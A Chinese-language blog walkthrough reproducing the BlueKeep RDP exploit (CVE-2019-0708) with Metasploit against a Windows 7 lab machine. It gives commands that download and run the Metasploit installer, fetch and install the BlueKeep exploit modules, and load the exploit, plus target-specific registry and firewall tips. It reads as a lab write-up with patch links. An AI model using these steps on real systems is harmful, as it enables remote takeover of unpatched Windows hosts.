CVE-2019-0708复现
前言
此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。
影响
- Windows 8和Windows 10及之后版本的用户不受此漏洞影响。
工具
msf
安装msf
1
2
3curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall更新msf
1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
ps:如果重装的msf
.可能会遇到gem库
的问题,遇到pcaprb
无法安装的时候
输入sudo apt-get install libpcap-dev
然后继续bundle install
替换文件
执行以下命令,如果报没有文件夹错误,请mkdir
创建文件夹1
2
3
4
5
6
7
8
9
10
11
12
13
14
15wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
网上有将文件放置usr
目录下的教程,我出现不能调用模块的问题了,所以参考了放置opt
目录解决了问题
重置数据库
命令如下
msfdb reinit
参数含义
target参数1
2
3
4
5
6
7Available targets:
Id Name
-- ----
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
实验
靶机win7 x64
1 | msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce |
注意
目前公开的利用代码可用于攻击Windows 7 SP1 x64
与 Windows 2008 R2 x64
,该EXP并不稳定,针对 Windows 7 SP1 x64
攻击有可能导致蓝屏。并且Windows2008 R2 x64
需要修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]
值修改为0
才能攻击成功。实验时记得关闭防火墙,不然会出现下面情况
效果
拿到靶机权限
补丁
360网盘 (提取码:68c8)
官方源:
参考文章
1.360微信推文
3.github项目
4.xkkhh复现